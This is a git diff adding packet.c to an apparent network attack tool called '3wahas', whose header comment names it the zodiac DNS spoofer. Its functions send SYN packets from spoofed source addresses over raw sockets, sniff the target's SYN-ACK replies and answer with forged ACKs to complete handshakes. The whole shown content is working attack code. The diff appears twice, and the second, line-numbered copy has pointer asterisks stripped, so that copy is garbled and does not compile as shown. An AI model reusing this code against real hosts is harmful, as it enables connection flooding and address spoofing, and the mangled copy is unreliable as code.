1 files changed, 178 insertions, 0 deletions
diff --git a/other/3wahas/packet.c b/other/3wahas/packet.c
new file mode 100644
index 0000000..7dd521a
--- /dev/null
+++ b/other/3wahas/packet.c
@@ -0,0 +1,178 @@
+/* zodiac - advanced dns spoofer
+ *
+ * packet handling and queueing routines
+ * by scut
+ */
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <sys/time.h>
+#include <netinet/in.h>
+#include <netinet/if_ether.h>
+#include <arpa/inet.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <libnet.h>
+#include <pcap.h>
+#include "common.h"
+#include "packet.h"
+#include "network.h"
+#include "sniff.h"
+#include "3wahas.h"
+/* pq_grind
+ *
+ * grind the packets received from the sniffer thread, stripping ethernet
+ * header, filter non-TCP packets, add them to the packet queue, then raise
+ * the correct semaphore.
+ *
+ * `sinfo' gives information about the sniffing thread and the packet queue,
+ * `pkthdr' is from the pcap handler and `pkt' contains the real packet data.
+ */
+void
+pq_grind (void *sinfov, struct pcap_pkthdr *pkthdr, u_char *pkt)
+{
+        size_t          psize;
+        sniff_info      *sinfo = (sniff_info *) sinfov;
+        eth_hdr         *eth = (eth_hdr *) pkt;
+        ip_hdr          *ip;            /* IP packet header pointer */
+        tcp_hdr         *tcp;           /* UDP packet header pointer */
+        char            *ip_src, *ip_dst;
+        /* check if it is a IP/UDP packet, if not, silently skip it
+         */
+        if (pkthdr->caplen < (sizeof (eth_hdr) + sizeof (tcp_hdr)))
+                return;
+        if (eth->eth_type != htons (ETH_P_IP))
+                return;
+        ip =    (ip_hdr *)      (pkt + sizeof (eth_hdr));
+        tcp =   (tcp_hdr *)     (pkt + sizeof (eth_hdr) + sizeof (ip_hdr));
+        psize = pkthdr->caplen - sizeof (eth_hdr);
+        if (ip->ip_proto != IPPROTO_TCP)
+                return;
+        if ((ip->ip_src.s_addr != sinfo->ip_dst.s_addr))
+                return;
+        if (((tcp->th_flags & TH_SYN) != TH_SYN) || ((tcp->th_flags & TH_ACK) != TH_ACK))
+                return;
+        net_printipa (&ip->ip_src, &ip_src);
+        net_printipa (&ip->ip_dst, &ip_dst);
+        printf ("[%s:%5u] -> [%s:%5u] %c%c%c%c\n",
+                ip_src, htons (tcp->th_sport),
+                ip_dst, htons (tcp->th_dport),
+                ((tcp->th_flags & TH_SYN) == TH_SYN) ? 'Y' : ' ',
+                ((tcp->th_flags & TH_ACK) == TH_ACK) ? 'A' : ' ',
+                ((tcp->th_flags & TH_FIN) == TH_FIN) ? 'F' : ' ',
+                ((tcp->th_flags & TH_RST) == TH_RST) ? 'R' : ' ');
+        pq_3whs (ip, tcp);
+        free (ip_src);
+        free (ip_dst);
+        return;
+}
+void
+pq_3whs (struct ip_hdr *ip, struct tcp_hdr *tcp)
+{
+        u_char  *buf = xcalloc (1, sizeof (ip_hdr) + sizeof (tcp_hdr));
+        int     sock = open_raw_sock (IPPROTO_RAW);
+        if (sock == -1) {
+                free (buf);
+                return;
+        }
+        build_ip (TCP_H,
+                0,
+                1911,
+                0,
+                64,
+                IPPROTO_TCP,
+                ip->ip_dst.s_addr,
+                ip->ip_src.s_addr,
+                NULL,
+                0,
+                buf);
+        build_tcp (htons (tcp->th_dport),
+                htons (tcp->th_sport),
+                libnet_get_prand (PRu32),       /* seq */
+                htonl (tcp->th_seq) + 1,        /* yeah */
+                TH_ACK,
+                1024,
+                0,
+                NULL,
+                0,
+                buf + IP_H);
+        do_checksum (buf, IPPROTO_TCP, TCP_H);
+        write_ip (sock, buf, TCP_H + IP_H);
+        free (buf);
+        close (sock);
+        return;
+}
+void
+pq_syns (char *ip_src_c, char *ip_dst_c, u_short dst_prt)
+{
+        u_char  *buf = xcalloc (1, sizeof (ip_hdr) + sizeof (tcp_hdr));
+        int     sock = open_raw_sock (IPPROTO_RAW);
+        struct in_addr  ip_src,
+                        ip_dst;
+        ip_src.s_addr = net_resolve (ip_src_c);
+        ip_dst.s_addr = net_resolve (ip_dst_c);
+        if (sock == -1) {
+                free (buf);
+                return;
+        }
+        build_ip (TCP_H,
+                0,
+                1911,
+                0,
+                64,
+                IPPROTO_TCP,
+                ip_src.s_addr,
+                ip_dst.s_addr,
+                NULL,
+                0,
+                buf);
+        build_tcp (libnet_get_prand (PRu16),
+                dst_prt,
+                libnet_get_prand (PRu32),
+                0,
+                TH_SYN,
+                1024,
+                0,
+                NULL,
+                0,
+                buf + IP_H);
+        do_checksum (buf, IPPROTO_TCP, TCP_H);
+        write_ip (sock, buf, TCP_H + IP_H);
+        free (buf);
+        close (sock);
+        return;
+}

diff --git a/other/3wahas/packet.c b/other/3wahas/packet.c new file mode 100644 index 0000000..7dd521a --- /dev/null +++ b/other/3wahas/packet.c
@@ -0,0 +1,178 @@
	1	/* zodiac - advanced dns spoofer
	2	*
	3	* packet handling and queueing routines
	4	* by scut
	5	*/
	6
	7	#include <sys/types.h>
	8	#include <sys/socket.h>
	9	#include <sys/time.h>
	10	#include <netinet/in.h>
	11	#include <netinet/if_ether.h>
	12	#include <arpa/inet.h>
	13	#include <unistd.h>
	14	#include <stdio.h>
	15	#include <stdlib.h>
	16	#include <string.h>
	17	#include <libnet.h>
	18	#include <pcap.h>
	19	#include "common.h"
	20	#include "packet.h"
	21	#include "network.h"
	22	#include "sniff.h"
	23	#include "3wahas.h"
	24
	25
	26	/* pq_grind
	27	*
	28	* grind the packets received from the sniffer thread, stripping ethernet
	29	* header, filter non-TCP packets, add them to the packet queue, then raise
	30	* the correct semaphore.
	31	*
	32	* `sinfo' gives information about the sniffing thread and the packet queue,
	33	* `pkthdr' is from the pcap handler and `pkt' contains the real packet data.
	34	*/
	35
	36	void
	37	pq_grind (void sinfov, struct pcap_pkthdr pkthdr, u_char *pkt)
	38	{
	39	size_t psize;
	40	sniff_info sinfo = (sniff_info ) sinfov;
	41	eth_hdr eth = (eth_hdr ) pkt;
	42	ip_hdr ip; / IP packet header pointer */
	43	tcp_hdr tcp; / UDP packet header pointer */
	44	char ip_src, ip_dst;
	45
	46	/* check if it is a IP/UDP packet, if not, silently skip it
	47	*/
	48	if (pkthdr->caplen < (sizeof (eth_hdr) + sizeof (tcp_hdr)))
	49	return;
	50	if (eth->eth_type != htons (ETH_P_IP))
	51	return;
	52
	53	ip = (ip_hdr *) (pkt + sizeof (eth_hdr));
	54	tcp = (tcp_hdr *) (pkt + sizeof (eth_hdr) + sizeof (ip_hdr));
	55
	56	psize = pkthdr->caplen - sizeof (eth_hdr);
	57
	58	if (ip->ip_proto != IPPROTO_TCP)
	59	return;
	60
	61	if ((ip->ip_src.s_addr != sinfo->ip_dst.s_addr))
	62	return;
	63
	64	if (((tcp->th_flags & TH_SYN) != TH_SYN) \|\| ((tcp->th_flags & TH_ACK) != TH_ACK))
	65	return;
	66
	67	net_printipa (&ip->ip_src, &ip_src);
	68	net_printipa (&ip->ip_dst, &ip_dst);
	69
	70	printf ("[%s:%5u] -> [%s:%5u] %c%c%c%c\n",
	71	ip_src, htons (tcp->th_sport),
	72	ip_dst, htons (tcp->th_dport),
	73	((tcp->th_flags & TH_SYN) == TH_SYN) ? 'Y' : ' ',
	74	((tcp->th_flags & TH_ACK) == TH_ACK) ? 'A' : ' ',
	75	((tcp->th_flags & TH_FIN) == TH_FIN) ? 'F' : ' ',
	76	((tcp->th_flags & TH_RST) == TH_RST) ? 'R' : ' ');
	77
	78	pq_3whs (ip, tcp);
	79
	80	free (ip_src);
	81	free (ip_dst);
	82	return;
	83	}
	84
	85
	86	void
	87	pq_3whs (struct ip_hdr ip, struct tcp_hdr tcp)
	88	{
	89	u_char *buf = xcalloc (1, sizeof (ip_hdr) + sizeof (tcp_hdr));
	90	int sock = open_raw_sock (IPPROTO_RAW);
	91
	92	if (sock == -1) {
	93	free (buf);
	94	return;
	95	}
	96
	97	build_ip (TCP_H,
	98	0,
	99	1911,
	100	0,
	101	64,
	102	IPPROTO_TCP,
	103	ip->ip_dst.s_addr,
	104	ip->ip_src.s_addr,
	105	NULL,
	106	0,
	107	buf);
	108
	109	build_tcp (htons (tcp->th_dport),
	110	htons (tcp->th_sport),
	111	libnet_get_prand (PRu32), /* seq */
	112	htonl (tcp->th_seq) + 1, /* yeah */
	113	TH_ACK,
	114	1024,
	115	0,
	116	NULL,
	117	0,
	118	buf + IP_H);
	119
	120	do_checksum (buf, IPPROTO_TCP, TCP_H);
	121	write_ip (sock, buf, TCP_H + IP_H);
	122
	123	free (buf);
	124	close (sock);
	125
	126	return;
	127	}
	128
	129
	130	void
	131	pq_syns (char ip_src_c, char ip_dst_c, u_short dst_prt)
	132	{
	133	u_char *buf = xcalloc (1, sizeof (ip_hdr) + sizeof (tcp_hdr));
	134	int sock = open_raw_sock (IPPROTO_RAW);
	135	struct in_addr ip_src,
	136	ip_dst;
	137
	138	ip_src.s_addr = net_resolve (ip_src_c);
	139	ip_dst.s_addr = net_resolve (ip_dst_c);
	140
	141	if (sock == -1) {
	142	free (buf);
	143	return;
	144	}
	145
	146	build_ip (TCP_H,
	147	0,
	148	1911,
	149	0,
	150	64,
	151	IPPROTO_TCP,
	152	ip_src.s_addr,
	153	ip_dst.s_addr,
	154	NULL,
	155	0,
	156	buf);
	157
	158	build_tcp (libnet_get_prand (PRu16),
	159	dst_prt,
	160	libnet_get_prand (PRu32),
	161	0,
	162	TH_SYN,
	163	1024,
	164	0,
	165	NULL,
	166	0,
	167	buf + IP_H);
	168
	169	do_checksum (buf, IPPROTO_TCP, TCP_H);
	170	write_ip (sock, buf, TCP_H + IP_H);
	171
	172	free (buf);
	173	close (sock);
	174
	175	return;
	176	}
	177
	178